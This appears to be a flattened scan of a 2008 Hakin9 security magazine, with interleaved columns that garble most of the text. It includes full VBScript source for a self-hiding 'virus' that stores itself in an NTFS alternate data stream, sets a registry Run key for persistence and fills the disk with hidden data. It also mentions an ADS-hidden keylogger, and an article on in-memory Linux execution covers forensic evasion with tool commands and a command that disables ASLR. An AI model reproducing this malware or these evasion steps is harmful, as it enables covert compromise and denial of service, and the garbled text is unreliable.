K. Sood is an independent security researcher application. The database can be updated demonstrate the point discussed above. and founder of SecNiche Security.His online handle is 0kn0ck. He holds a BE and a MS in Cyber Law very easily from a security point of view. The The error pages are comprised in and Information Security. He is an active speaker at blind SQL injections can be run based on the path errors that originate from the conferences like XCON, OWASP, and CERT-IN.. His research interests include penetration testing, reverse SQL information. The content manipulation misconfiguration of parameters. The engineering and web application security. Aditya’s inference attack can be performed very configuration is an important part of research has been featured in the USENIX login. Aditya’s research projects include CERA, Cutting Edge Research easily by rendering the response code of development and should be done in a Analysis on Web Application Security (http://www.cera.s the web server to a constant value. One proper manner. ecniche.org)and Mlabs featuring incore research (http: //mlabs.secniche.org). The penetration testing issues are can test the application by the process of These types of errors reveal structured under TrioSec project. (http://www.triosec.secni parameter splitting and balancing. Once information which can be used to che.org). For regular updates on his work visit: • http://www.secniche.org the internal interface of the database launch directory traversal attacks and • http://zeroknock.blogspot.com28 HAKIN9 4/2008 4/2008 HAKIN9 29 ATTACK LAIC AURELIAN Alternate Data Streams or “Doctor Jekyll and Mr. Hyde” Move to NTFS (Part II)Difficulty In the first part, we saw just the possibilities respectively: how simple it is to attach, extract and launch malicious code hidden in ADS. In the following examples, we will show a full program (script) that acts like a virus and exploits ADS in order to make itself invisible and damage a system. his example was created using very few below. It is recommended that only advanced lines of code and without using advanced users try this example and modify the code in T techniques. As in the previous article, the Listing 1. code was written in VB script language for easy Function IsNTFS will verify if the drive is NTFS. understanding. This code will try to execute a It is the first thing we need to perform because Denial of service attack. According to Microsoft, ADS works only on NTFS drives. If the answer is a Denial of service attack prevents normal use yes, the script will run; or else, the script will quit. of a computer or network by valid users; in The code for this function is presented in this case, it will fill the disk space with random Listing 2. data. In essence, this virus will hide itself in a If the script is located on an NTFS drive, we stream attached to a folder where it is located will verify if the script has been already attached and then fill the disk with random data hidden to a folder or file. If it is not attached, we will try to in other ADS created locations attached also attach it to the folder where the script is located. to this folder. Furthermore, to avoid damaging We use function IsADS to verify if the full path of your computer, this script (as it is) will create the script contains two colons; if it does, it returns just a few streams and will not block your True, else it returns False. This is definitely not an machine. elegant code, but it is very clear. The code for this function can be found in Listing 3.Option Explicit If the script is not attached to another file WHAT YOU WILL dim fx or folder we will attach it to the folder where the LEARN... fx=movescript script is located using the File System Object and How to create and use Alternate WScript.Quit copyfile command. Data Streams for various puposes This is the call for the main function of the script fso.copyfile WScript.ScriptFullName, Ffolder A practical example of how a (called MoveScript in this example). The first time malicious program could exploit & ":" & Fname ADS in order to make itself this script is launched it will attach the script to invisible the folder where the script is located as an ADS, Now, we must be sure that the script will be WHAT YOU SHOULD then it will re-launch the script and set the script launched when the OS is started. For this KNOW... to be launched with Windows. Any time the script purpose, we will create a batch script that will run Basic knowledge of Visual Basic is launched it will write to 10 ADS attached also with the OS; this script will launch our script. Again, Script to the folder where the script was launched for this is not an efficient solution, but this will show Basic knowledge of VBA the first time. All the functions used are explained another technique used in the malicious code: 30 HAKIN9 4/2008 THE MALICIOUS USE OF ADS batch files. This function will receive the address of our script as a parameter, and Listing 1. Function MoveScript will create the files (see Listing 4). Function MoveScript This will create batch scripts that will On error resume next launch our script. If IsNTFS =false then WScript.Quit Now, we need to add a registry entry. We could use a shell object to modify the Dim fso, fsoFile Dim Fname, Ffolder registry as shown in Listing 5. Set fso = CreateObject("Scripting.FileSystemObject") Another function used in this code is set fsoFile=fso.getfile(WScript.ScriptFullName) StartShell. This function creates a shell Ffolder=fsoFile.ParentFolder Fname=fsoFile.Name object used to run an executable or a if IsADS=false then batch script. The code below will do this fso.copyfile WScript.ScriptFullName,Ffolder & ":" & Fname job. movescript=Ffolder & ":" & Fname CreateBat(Ffolder & ":" & Fname) RegistrySet Function StartShell(FileName) StartShell(Ffolder & ":" & Fname) dim shell else movescript=WScript.ScriptFullName set shell=createobject("wscript.she CreateBat(movescript) ll") writetoADS shell.run filename,0 RegistrySet set shell=nothing End If set fso=nothing End Function End functionIf all the codes work well up till now, we Listing 2. Function IsNTFS have just one thing left to do: to fill the disk with random data and to keep this data Function IsNTFS() Dim fso, fsoDrv hidden. For this, we will use the function IsNTFS = False WritetoADS : see Listing 6. Set fso = CreateObject("Scripting.FileSystemObject") In our case, we will not fill the disk with Set fsoDrv = fso.GetDrive(fso.GetDriveName(WScript.ScriptFullName)) Set fso = Nothing random data for security reasons. We If fsoDrv.FileSystem = "NTFS" Then IsNTFS = True will create just ten streams and we will End Function write in only 1001 random bytes each of Listing 3. Function IsADS them. The i cycle will create a stream of 1001 characters in length but you could Function IsADS easily create a larger stream. Then in j IsADS =false cycle, we create 10 ADS and we write Dim Sname Sname=WScript.ScriptFullName the random bits in streams. If ADS was Dim i , c, ct already created, the script will append ct = 0 random data, if ADS was not created, yet, For i = 1 To Len(Sname) the script first creates ADS then writes c = Mid(Sname, i, 1) If c = ":" Then ct = ct + 1 random data on it. The code could be Next very easily modified in order to create a If ct > 1 Then IsADS=true large amount of ADS. End function In this code we put a fixed amount Listing 4. Create bat script of random data, but with a little change we could generate a large amount of "C:\Windows\Winstart.bat" and "C:\Winstart.bat" alternate data streams attached to our Function CreateBat(r) On error resume next folder and also the quantity of random Dim fso data could be very easily increased. If Set fso = CreateObject("Scripting.FileSystemObject") we do so in a short period, the disk will Dim ts be full. Try yourself to see how fast you Set ts = fso.CreateTextFile("C:\Windows\Winstart.bat") dim tx could create 1 Gigabyte of hidden data tx= "Start " & r and you will be surprised. But remember ts.Write tx that every time you restart the Windows ts.close fso.copy "C:\Windows\Winstart.bat","C:\Winstart.bat" OS, the script will run. This attack is very set fso=nothing efficient and it is very hard for a system End Function administrator to detect the file or directory 4/2008 HAKIN9 31 ATTACK THE MALICIOUS USE OF ADS that is filling up the disk. Also, this virus-like For we only want to see how Save the file as MyVirus.vbs or any code does not continue multiplying itself- dangerous the ADS could be and not name you like but with vbs extension in only once, when it was launched the first create a virus, we eliminate some lines your Test folder (it is recommended to time. But with another few lines of code of code and modify others, keeping the create a new folder for this test). Then we could multiply the script and attach it example fully functional. Also, in order run the script (double click on it or use to many other files or folders. In this case, to be more explicit, the code is not too command prompt to open it). the system could also crash because of elegant in some sections. Start Notepad the insufficient memory. and then type the code from Listing 7. ADS and Microsoft Office Suite From simple programs, that track Listing 5. Modify registry keys user activity, to advanced programs Dim s for steganography, there are many Set s=CreateObject("WScript.Shell") possibilities to use ADS to our benefit. s.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsExplorer", "C: The next example will show you how to \Windows\Winstart.bat", "REG_SZ" or, we could use a more complicated function that will create a batch script, run the use ADS in order to save a history of any script and then delete it: Word documents. Every time we open or Function RegistrySet close a Word document, the operation will 'on error resume next be logged into an ADS attached to that dim REGV REGV="C:\Windows\Winstart.bat" Word document. Also a backup copy of Dim fso the document will be created when the Set fso = CreateObject("Scripting.FileSystemObject") document is opened. Dim ts Set ts = fso.CreateTextFile("C:\Win1.bat") Start Microsoft Word by opening a dim tx previously created Word document or open ts.writeline "@ECHO OFF" a new one. Open Visual Basic Editor using tx= "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsExplorer /t menu Tools: Tools >Macro >Visual Basic REG_SZ /d " & RegV & " /f" ts.Writeline tx Editor. ts.Writeline "Del C:\Win1.bat" In the View menu select Project Explorer ts.close to open Project Window. In the Project set ts=nothing StartShell("C:\Win1.bat") Window select the project Normal and then End Function select ThisDocument from Microsoft Word Objects (double click on it). Listing 6. Function WriteToADS Type the following code from Listing 8 Function WriteToADS in Code window. dim i, j Close the Visual Basic Editor window, Dim StreamText save the document and close it. Now Dim StreamName Dim StreamNameJ every time you open a Word document, StreamName=WScript.ScriptFullName this code will create a backup copy of StreamName=left(StreamName,len(StreamName)-4) our document saved in our document Dim fso folder and will write in ADS the name Set fso = CreateObject("Scripting.FileSystemObject") Dim ts EditLog.txt attached to our document StreamText=now() and timestamped when the document for i= 0 to 1000 was opened. When we close a Word randomize time document, a short resume will be written StreamText=StreamText & Chr(Int(40 + Int(Rnd * 27))) next to ADS including a counter for paragraphs for j=1 to 9 and characters, with timestamp and full StreamNameJ= StreamName & j & ".txt" path of the document. This example keeps if fso.fileexists(StreamNameJ)=false then Set ts = fso.CreateTextFile(StreamNameJ) a very simple history but could be very else easily improved in order to store more set ts=fso.opentextfile(StreamNameJ,8) information about the document. To view end if the history of a document you could use ts.Writeline StreamText MyADS program that accompanies this ts.close article or you could use other utilities Next like Notepad or command prompt. For WritetoADS=true example: ' Close the app End function Click Start, and then click Run. Presuming you have a document C:32 HAKIN9 4/2008 4/2008 HAKIN9 33 ATTACK THE MALICIOUS USE OF ADSListing 7. Script codeScript code: randomize time Option Explicit StreamText=StreamText & Chr(Int(40 + Int(Rnd * 27))) dim fx next fx=movescript WScript.Quit for j=1 to 9 StreamNameJ= StreamName & j & ".txt" Function MoveScript if fso.fileexists(StreamNameJ)=false then on error resume next Set ts = fso.CreateTextFile(StreamNameJ) If IsNTFS =false then WScript.Quit else Dim fso, fsoFile set ts=fso.opentextfile(StreamNameJ,8) Dim Fname, Ffolder end if Set fso = CreateObject("Scripting.FileSystemObject") set fsoFile=fso.getfile(WScript.ScriptFullName) ts.Writeline StreamText Ffolder=fsoFile.ParentFolder ts.close Fname=fsoFile.Name Next if IsADS=false then WritetoADS=true fso.copyfile WScript.ScriptFullName,Ffolder & ":" & ' Close the app Fname End function movescript=Ffolder & ":" & Fname CreateBat(Ffolder & ":" & Fname) Function CreateBat(r) RegistrySet on error resume next StartShell(Ffolder & ":" & Fname) Dim fso else movescript=WScript.ScriptFullName Set fso = CreateObject("Scripting.FileSystemObject") CreateBat(movescript) Dim ts writetoADS Set ts = fso.CreateTextFile("C:\Windows\Winstart.bat") RegistrySet dim tx End If tx= "Start " & r set fso=nothing ts.Write tx End function ts.closeFunction IsNTFS() fso.copy "C:\Windows\Winstart.bat","C:\Winstart.bat" Dim fso, fsoDrv set fso=nothing IsNTFS = False End Function Set fso = CreateObject("Scripting.FileSystemObject") Set fsoDrv = fso.GetDrive(fso.GetDriveName(WScript.ScriptF Function RegistrySet ullName)) 'on error resume next Set fso = Nothing dim REGV If fsoDrv.FileSystem = "NTFS" Then IsNTFS = True REGV="C:\Windows\Winstart.bat" End Function Dim fso Set fso = CreateObject("Scripting.FileSystemObject") Function IsADS Dim ts IsADS =false Set ts = fso.CreateTextFile("C:\Win1.bat") Dim Sname dim tx Sname=WScript.ScriptFullName ts.writeline "@ECHO OFF" Dim i , c, ct tx= "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ct = 0 /v WindowsExplorer /t REG_SZ /d " & RegV For i = 1 To Len(Sname) & " /f" c = Mid(Sname, i, 1) If c = ":" Then ct = ct + 1 ts.Writeline tx Next ts.Writeline "Del C:\Win1.bat" If ct > 1 Then IsADS=true ts.close End function set ts=nothingFunction WriteToADS StartShell("C:\Win1.bat") dim i, j End Function Dim StreamText Dim StreamName Function StartShell(FileName) Dim StreamNameJ dim shell StreamName=WScript.ScriptFullName set shell=createobject("wscript.shell") StreamName=left(StreamName,len(StreamName)-4) Dim fso shell.run filename,0 Set fso = CreateObject("Scripting.FileSystemObject") set shell=nothing Dim ts End Function StreamText=now() for i= 0 to 100032 HAKIN9 4/2008 4/2008 HAKIN9 33 ATTACK THE MALICIOUS USE OF ADS\WordDoc.doc, in Open box type the 21:02:25: Close document for the user. This article is mostly focused following command (replace C:\ Path: C:\ADS on a full application named MyADS. This WordDoc.doc with a valid word document) Full name: C:\ADS\Article1.doc is a quick application with many features Paragaphs: 224 implemented only for demonstration Notepad.exe C:\WordDoc.doc:EditLog.txt Characters: 22452 purposes. If you want to hide important documents using ADS you need to use an You should see in a Notepad Window Alternate Data encryption program first in order to encrypt something like: Streams and MyADS the content; it is not enough just to hide the As we learnt from my first article on ADS, document!11/09/07 21:02:05: Open document11/ this feature of NTFS could be exploited in One use of ADS is for preventing the 09/07 various ways in order to produce benefits accidental deletion of files by attaching them to a system file/folder or executable that is less likely to be deleted. MyADS allows a user to hide files directly as streams attached to other files with a visual interface (unlike DOS programs which need special knowledge and are hard to use). Select where and what to hide and with a simple click the job is done.Figure 1. MyADS applicationFigure 3. MyADS programFigure 2. MyADS application Figure 4. MyADS34 HAKIN9 4/2008 4/2008 HAKIN9 35 ATTACK THE MALICIOUS USE OF ADSIn the previous article, I described with a built in Keylogger that captures both reports and screenshots are saved a possible use of ADS by attaching a keyboard, clipboard and screenshots as ADS in the file where keylogger is keylogger into an innocent file/folder. from the computer in the invisible mode. installed. After you install the keylogger, MyADS implements this feature; it comes The keylogger is installed as ADS and you are able to see capture reports and screenshots from the computer where the keylogger was installed. But the main feature of this program is the possibility to work with streams. It could scan for streams in a folder or an entire hard disk or, it could list the streams attached to a file; it could extract and run the streams; it could delete streams; and it could open streams with a text editor. It works only with streams attached to files but it offers a visual interface for these operations unlike other programs. I developed this program especially for Hakin9 magazine to accompany this article and because there are very few programs that deal with ADS. I hope all the information about ADS with its good parts and bad parts was useful.Figure 5. ADS Word ScriptListing 8. VBA code for Microsoft Word examplePrivate Sub Document_Close() End Sub 'On Error Resume Next Dim MText As String Private Sub WriteToADS(MyText As String) MText = "Close document" & vbCrLf 'On Error Resume Next MText = MText & "Path: " & Application.ActiveDocument.Path & If IsNTFS(Application.ActiveDocument.FullName) = False Then vbCrLf Exit Sub Dim fso MText = MText & "Full name: " & Application.ActiveDocument.Ful Set fso = CreateObject("Scripting.FileSystemObject") lName & vbCrLf Dim streamText As String Dim fname As String MText = MText & "Paragaphs: " & Application.ActiveDocument.Par fname = Application.ActiveDocument.FullName & ":EditLog.txt" agraphs.Count & vbCrLf Dim ts MText = MText & "Characters: " & Application.ActiveDocument.Ch If fso.fileexists(fname) = False Then aracters.Count & vbCrLf Set ts = fso.CreateTextFile(fname) WriteToADS MText Else End Sub Set ts = fso.opentextfile(fname, 8) End If Private Sub Document_Open() streamText = Now & ": " & MyText 'On Error Resume Next ts.Write streamText WriteToADS "Open document" ts.Close 'Make a backup copy!!! Set fso = Nothing Dim fso End Sub Set fso = CreateObject("Scripting.FileSystemObject") Dim Fn1 As String, fn2 As String Private Function IsNTFS(FileName As String) Fn1 = Application.ActiveDocument.FullName Dim fso, fsoDrv fn2 = Application.ActiveDocument.Path & "\B" & Application.Act IsNTFS = False iveDocument.Name Set fso = CreateObject("Scripting.FileSystemObject") Set fsoDrv = fso.GetDrive(fso.GetDriveName(FileName)) If fso.fileexists(fn2) = True Then Set fso = Nothing fso.deletefile fn2, True End If If fsoDrv.FileSystem = "NTFS" Then IsNTFS = True fso.CopyFile Fn1, fn2 End Function34 HAKIN9 4/2008 4/2008 HAKIN9 35 ATTACKANTHONY DESNOS FRÉDÉRIC GUIHÉRY MICKAËL SALAÜN All in Memory Execution under Linux DifficultyDuring a computer intrusion, a good attacker has to pay close attention to the traces he could leave on the remote target. The following article will describe different techniques that provide enough discretion in order to bypass the usual countermeasures. e will see in particular how to execute ELF • If the attacker wants to install another tool like binaries on the target while remaining a rootkit, he must download it to the hard drive. W furtive. These techniques are known as This will leave manifest traces even if the file Syscall Proxy and Remote Userland Execve. The tools is deleted from the hard drive and covered up presented here work on the Linux operating system, by another one. A fine analysis of the disk in a but the same techniques are applicable on other OS. cleanroom can show the original file. In fact, in order to definitively eliminate any traces of A Need for Discretion our compromising data, it is advised to rewrite Usually, an attacker, especially a beginner, will over it at least seven times. not take care of all the side effects produced by the tools he is using. These effects can have the Obviously, an experienced administrator will not following incidence on the remote computer: have difficulties to find out that his server is being or has been compromised. • If he opens a shell like /bin/bash, all the In this article, we will show how to bypass the commands are logged in a history file (by above issues, by executing our tools within the default ~/.bash _ history). memory space of a legitimate process or service • If he runs a new process, this one will appear (like Apache or Postfix). The scope is therefore in the process tree (as shown by the ps or limited to a subpart of an attack: exactly just after the pstree command) and it could leave logs exploitation of a vulnerability, in other words where in the directory /var/log/ or on a remote the executing flow is at the beginning of the payload. host (especially if syslogd is well configured). We will learn also that the other main interest Besides, in order to run, the executable file of the Syscall Proxy and Remote Userland Execve WHAT YOU WILL LEARN... has to be launched directly from a shell or techniques is its robustness against forensics from inside another program by calling a analysis. Indeed, the fact that all the exploitation is All in memory's rules function like exec(). This is not really discreet done in memory space will not leave any evidence New generation of all in memory's tools particularly if an IDS probe is running. of our presence. This is especially true after the • The user will appear as connected as we can classical operation done by forensics people when Protect against all in memory see in the output of the commands who, w or they arrive on the crime scene: halting the system. WHAT YOU SHOULD even last. KNOW... • The different connections made between our Existing Techniques and Tools C/ASM computer and the target will appear as we This section presents the current techniques <a href="/tags/Linux_Kernel/" rel="tag">Linux Kernel</a> can see with netstat or lsof. that allow an intruder to take advantage of 36 HAKIN9 4/2008 MEMORY EXECUTION UNDER LINUX the all-in-memory corruption. Some Syscall Proxy, but he did not release it at memory exploitation in order to be as tools were made before randomization that time. He has also further developed exhaustive as possible, and also because protection was added (in Linux 2.6.11), the proxy server and client that are based the idea behind it appears pretty nice. which prevents for example, an on this library. The first one is UW_ attacker from obtaining the address injectprocess, which injects the code Userland Execve of the stack, making the exploitation of directly in the .text segment of a process, The second approach is called Userland buffer overflows more difficult. The tool and then hijacks the GOT table in order to Execve. The purpose is to launch a impacted is Self. If the reader wants to substitute the desired syscalls by a proxy program on a system without the system try it, we advise him to deactivate the function (called the parasite). The next call sys _ execve. which is usually randomization of the stack: tool, UW _ sp _ mmapinject, as its name employed on the Linux operating system suggests, calls the mmap system call in to run an executable file. This solution # echo 0 > /proc/sys/kernel/randomize_ order to map in memory the shellcode provides different advantages. At first, va_space which contains the parasite. Casek said we can execute programs that are that it could even be possible to take unauthorized for us. Moreover, we have However, the last tools like Pitbull and advantage of the environment variable the opportunity to be really unnoticeable, Sanson the Headman manage to bypass LD _ PRELOAD, which is used by the link because most security probes, if they are this protection. editor, in order to load a specific library present, usually monitor only the programs at runtime. This would be useful to build launched from a Shell or even the use of a Syscall Proxy a proxy server on the target. A potential few system calls like sys _ execve. Here The first technique, that allows us to never implementation of this method could be are the six steps that describe the userland write to the hard drive, is called Syscall released in the tool UWskyzoexec. execve technique: Proxy. It consists of executing a program Despite the fact that no public tool that entirely on the network by sending most implements a Syscall Proxy is available, • Unmapping of the memory pages of of the instructions to the exploited server. we wanted to mention this technique of the current process More precisely, when a usual program is running, it sends many system calls to the Listing 1. Test "ul_exec" with a simple example kernel in order, for example, to have access to the I/O periphereals. With Syscall Proxy, $ make test all the system calls are sent by the attacker, gcc -Wall -ggdb -pedantic -o test main.c -ldl treated by the kernel of the server, and their $ cat hakin9.c #include <stdio.h> results are returned. #include <unistd.h> Most of the execution is therefore #include <string.h> deported on the targeted computer. However, #define hello "Hello Hakin9 !\n" even though this method appears original, it extensively uses the network resources. int Its performance is thereby directly related main(void) because a huge amount of messages { write(1, hello, strlen(hello)); transit on the network (two per system call). return (0); But most of all, the capacity of detection by } the administrators becomes pretty easy. $ /usr/bin/diet -Os gcc -Wall -o hakin9 hakin9.c $ ./test ./hakin9 The first implementation of a Syscall Hello Hakin9 ! Proxy has been developed by Maximiliano Caceres from the Core Security Listing 2. Ul_exec functions' sequence Technologies company and has been [a] - Elf_buf = mmap(binaire) released in one of their best products, [b] - dlopen libulexec Core-Impact. This is a commercial [c] - ul_exec(Elf_Buf, argc, argv, envp) tool specialized in penetration testing. [d] - ul_save_args(argv) [e] - ul_save_args(envp) Unfortunately, its price might keep many [f] - ul_exec_common(Elf_buf, argc, argv, envp) people away. [g] - ul_map_down During the Chaos Computer Camp [h] - ul_load_elf in 2005 [1] [2], Casek, from the UberWall [i] - load_linker [j] - load_elf_buf team, unveiled his implementation of [k] - brk a Syscall Proxy, UW _sp _ xxx _ X86, [l] - ul_setup_stack which was based on the algorithm by [m] - set_stack Maximiliano. He talked about a micro [n] - jmp_addr library, UW _ splib, that integrates the 4/2008 HAKIN9 37 ATTACK• If we want to run a dynamically Userland Execve mechanism explain above. the file system, and then the ELF binary [j]. compiled binary, we have to first load This is transparent, but the result attests the We must take care to put the correct rights the link editor in memory correctness of the execution. on each PT _ LOAD segment, with the help • Load of the binary code in memory The reader wants probably to of the system call mprotect(). Finally, we • Initialization of both heap and stack understand more precisely how it works initialize the heap [k] and then the stack [l] • Look for the entry point (of the static from the inside. So, a part of the tool Ul _ with the correct arguments and environment binary or the link editor in case of exec is a library that we need to load in the variables. Therefore, the initialization of the dynamic binary) main program (the launcher) to be able to stack pointer [m] can be done [m], and we • Transfer the execution flow to the above call ul_exec(void *ELF _ buf, int argc, char transfer the execution [n] to the begining of entry point **argv, char **envp). This function takes the linker (in case of dynamic binary) or to as parameter the ELF binary (hakin9 in the the beginning of the first code segment (for The Grugq has been the first to publicly example) mapped to a memory address, the static binary). present this method on the mailing list Full the number of arguments, environment and Disclosure [3]. His tool, Ul _ exec, is based arguments variables. Remote Userland Execve on a library that provides a way to load Let's take a look at the scheme of a This last method offers neither more nor dynamic binaries. It uses the Diet libc in classical attack with Ul_exec where we less than the above technique, except that order to take less memory, and has been want to execute a binary in userland, inside all is done from a remote attacker. One developed as a proof of concept. Therefore, another program (Listing 2). more time, The Grugq is at the origin of the it is not rather usable in a real attack nor in In [a], we put the binary that we want to first implementation of a Remote Userland penetration testing. execute in memory. To do that, Ul _ exec Execve, in his tool Rexec [5]. Let's see a simple example of this uses the mmap() function, but we could Despite an interesting handover, tool. The idea is to run an ELF binary have put the binary directly in the stack, Rexec is just a bit more than a proof of inside another process. The first step is to because it is remapped thereafter. Then, in concept and, thereby, is not usable in real download the file ul _ exec-1.1.tar.gz, [b], the program where we dynamically load attacks. Meanwhile, Pluf and Ripe from the which is uuencoded in the article shown the library libulexec.so with dlopen() and team 7a69ezine [6] have released SELF in reference [4]. Then, you just have to resolve the memory address of Ul _ exec (Shellcode ELF loader) in 2005. compile it by typing make (you can adapt with dlsym(). When we get this address, we The following example shows two the variable DIET in the Makefile in order call it [c]. In consequence, the arguments consoles. The first one belongs to the to adapt it to the path of your library). The [d] and the environment variables [e] are attacker while the second one represents code source of the ELF binary we want to copied in a new structure allocated by the exploited server. We assume that the run in userland is shown on the excerpt. We mmap(). Then, Ul _ exec _ common [f] is first part of a usual attack is already done compile it with the Diet libc library. Finally, we called in order to unmap the code segment, on the target and that the executing flow is execute the main program which can be the data segment and the bss segment [g] now at the beginning of the payload named seen as a launcher for the hakin9 binary. that belong to the current process. In [h], jumper. Here, we just simulate this payload This launcher will perform all the steps of the we load the link editor [i], by taking it from by running the jumper directly from a Shell. This one is listening for an incoming network connection on the port 2600. Listing 3. Compile SELF and run a self binary (client side) On the first excerpt, we can see the kevin@attacker:~/self$ cat hakin9_self.c source code of the ELF binary we want #include <stdio.h> to execute on the remote target. We just #include <stdlib.h> compile it statically. We compile also the int main(int argc, char **argv, char **envp) SELF tool and finally we launch it with the { required arguments: int i; • The remote IP address printf("Inside the server\n"); for(i = 0; i < argc; i++) • The remote port printf("argv[%i] = %s\n", i, argv[i]); • The name of the ELF binary for (i = 0 ;envp[i]; i++) • A list of arguments, printf("envp[%i] = %s\n", i, envp[i]); arg1 ... argN • A list of environment variables, env1 return(0); ... envN } kevin@attacker:~/self$ make linux_x86_32 Here, the builder will connect to the jumper gcc -O2 -Isrc/ src/jumper.c -o bin/jumper gcc -O2 -Isrc/ -static src/test.c -o bin/test and will send it the binary with some gcc -O2 -Isrc/ -DSYS_LINUX src/loader_x86_32.S src/builder.c -o bin/builder argument and environment variables. kevin@attacker:~/self$ gcc -O2 -static hakin9_self.c -o hakin9_self The result presented in Listing 3 shows kevin@attacker:~/self$ ./bin/builder 10.0.0.2 2600 hakin9_self hello admin that execution of the ELF binary hakin9 38 HAKIN9 4/2008ATTACK MEMORY EXECUTION UNDER LINUX is correctly done on the remote process order to use it in penetration testing. In fact, • Execution of static and dynamic binaries (inside the jumper). the previous tools are mostly considered • Reuse of the binaries sent, as many Result of a self binary (victim side): as a proof of concept. Sanson The times as we want Headman is rather an evolution of SELF • Encryption during the tranfer on the kevin@server:~/self$ ./bin/jumper 2600 and Pitbull, and is built in a modular way so network Inside the server that new features can be easily added. • Compression during the transfer argv[0] = hello • Deal with the randomization of the stack envp[0] = admin Overview • User interface (a shell that allows us to kevin@server:~/self$ Note what are the different characteristics manage many connection at the same implemented in Sanson: time) One limit of SELF is that it does not transfer the result to the attacker console. Thus, it Listing 4. Run a Pitbull binary (client side) is not easy to know if the remote execution was a success. The next tool fixes this issue. kevin@attacker:~/pitbull/bin$ cat cmd.c Pluf wanted to go further in the #include <stdio.h> technique of Remote Userland Execve int main(int argc, char **argv) by allowing a multi-execution of binaries. { Namely, we would be able to send one or int i; more executable files only one time and for(i = 0; i < argc; i++) run them as many times as we want. This { method has been implemented later in the system(argv[i]); tool Pitbull [4]. fflush(stdout); Let's see a simple way of using Pitbull. } return (0); We still have two consoles. We simulate } an exploit by launching the jumper, who will kevin@attacker:~/pitbull/bin$ gcc -O2 -Wall -static cmd.c -o cmd listen for a connection. The source code of kevin@attacker:~/pitbull/bin$ cat say.c #include <stdio.h> the files we want to execute on the server is shown on the first console. The attacker int main(int argc, char **argv) builds the two binaries and sends them { to the server with the command pbuilder FILE *f = fopen("/tmp/readme", "w"); fprintf(f, "hello you!\n"); which takes as arguments: fclose(f); return (0); • The remote IP address } • The remote port kevin@attacker:~/pitbull/bin$ gcc -O2 -Wall -static say.c -o say kevin@attacker:~/pitbull/bin$ ./pbuilder -h 207.46.13.254 -p 2601 cmd say • A list of ELF binaries compiled statically #001 [cmd ] offset:0x0007cd20 size:0x0007384f next:0x000f056f flags: Once the pbuilder is connected to the #002 [say ] offset:0x000f059f size:0x00072fab next:0x00000000 flags: remote jumper and has transfered the ELF pitbull# ls binaries, a prompt is available with some cmd say commands. The different ELF files can be pitbull# cmd pwd executed many times and we can see the /var pitbull# cmd ls result of their execution on the screen of backups cache lib local lock log the intruder (see Listing 4 and 5). mail opt run spool tmp Pitbull improves the implementation of pitbull# say the Remote Userland Execve mechanism pitbull# in many ways, especially with the Listing 5. Result of a pibull binary (victim side) availability of the multi-execution and multi- binaries features. However you still need to kevin@server:/var$ cat /tmp/readme kevin@server:/var$ ~/pitbull/test/jumper 2601 compile statically the ELF files you want to run on the target. Im waitting for you!!Sanson The Headman kevin@server:/var$ rm /tmp/readme kevin@server:/var$ tail -f /tmp/readme In this section, we will present the tool hello you ! we have recently developped, Sanson the Headman. Its aim is to automate the kevin@server:/var$ mechanism of Remote Userland Execve in 40 HAKIN9 4/2008 4/2008 HAKIN9 41 ATTACK MEMORY EXECUTION UNDER LINUX• Modularity of the code in order to have Finally, new users command can be easily by the other modules. The second one is the choice of the mechanism used: added. the user interface that communicate with • The mode of binary allocation Sanson The Headman is based on the remote target. Its name is Headman, (malloc, mmap, tmpfs...) four modules, as shown on the following and provides a shell that allows multiple • The way of transfering the binaries picture. The first module is the heart of the connection. The handover is pretty easy, (HTTP, FTP...) whole tool. It is a library named Sanson. especially the switch between the different • Support for IPv4 and IPv6 It offers all the functions that are needed sessions. Besides, the main commands Listing 6. Execute a binary (Headman side)$ ./headman32 choice: Sanson The Headman 0.1 [+] Header : Copyright (C) 2008 Sanson The Headman team. [+] NAME : busybox License GPLv3: GNU GPL version 3 <http://gnu.org/licenses/ [+] TOTAL SIZE 1181996 gpl.html> [+] TYPE 0 This is free software: you are free to change and redistribute [+] COMPRESS 0 it. [+] CRYPT 0 -- 14 commands loaded -- [+] SIZE 1181912 headman# new [+] NB -1 -- session 0 created -- [+] Binary : 0xb755a008 headman (session 0) # connect [+] Libs : 0x0 connection mode ? headman (session 0) # list * bind socket -> 'bind' (default) -- binaries available -- * find socket -> 'find' * nmap * connect back -> 'back' * busybox choice: headman (session 0) # exec remote address [127.0.0.1]: binary to execute: nmap remote port [2002]: arguments: -sT 10.0.0.42 protocol ? environment variables: * IPv4 -> '4' (default) -- preparing to run the binary 'nmap' -- * IPv6 -> '6' Starting Nmap 4.53 ( http://insecure.org ) at 2008-02-20 21: choice: 25 CET -- remote address : 127.0.0.1:2002 – mode : SOCKET_BIND Unable to find nmap-services! Resorting to /etc/services – proto : IPv4 -- Interesting ports on localhost (10.0.0.42): -- connecting to 127.0.0.1:2002 -- Not shown: 1176 closed ports -- connected to 127.0.0.1:2002 -- PORT STATE SERVICE headman (session 0) # send 25/tcp open smtp file to send: nmap 111/tcp open sunrpc compress ? 113/tcp open auth * none -> '1' (default) 631/tcp open ipp * zip -> '2' 3306/tcp open mysql * gzip -> '3' choice: Nmap done: 1 IP address (1 host up) scanned in 0.068 seconds crypt ? headman (session 0) # option * none -> '1' (default) option: find_name * XOR -> '2' value: 1 choice: -- sending option find_name=1 -- [+] Header : headman (session 0) # exec [+] NAME : nmap binary to execute: busybox [+] TOTAL SIZE 5954411 arguments: busybox cat /proc/cpuinfo [+] TYPE 0 environment variables: [+] COMPRESS 0 -- preparing to run the binary 'busybox' -- [+] CRYPT 0 processor : 0 [+] SIZE 5954327 vendor_id : GenuineIntel [+] NB -1 cpu family : 6 [+] Binary : 0xb767b008 model : 13 [+] Libs : 0x0 model name : Intel(R) Pentium(R) M processor 1.60GHz headman (session 0) # send stepping : 6 file to send: busybox cpu MHz : 600.000 compress ? cache size : 2048 KB * none -> '1' (default) ... * zip -> '2' * gzip -> '3' headman (session 0) # close choice: -- closing the remote connection -- crypt ? -- closing session number 0 -- * none -> '1' (default) headman# * XOR -> '2'40 HAKIN9 4/2008 4/2008 HAKIN9 41 ATTACK are simple to use, even if you try it for the • SANSON _ CMD _ LIST: Sending of the • LEON _ ACTION _ SIMPLECOPY – a copy first time, because you are guided through available binaries from the target of a memory zone the steps. • SANSON _ CMD _ EXIT: Exit from • LEON _ ACTION _ MPROTECT – useful The third module is the payload that Guillotine but keep listening for further to change the protection of some has to be executed with a 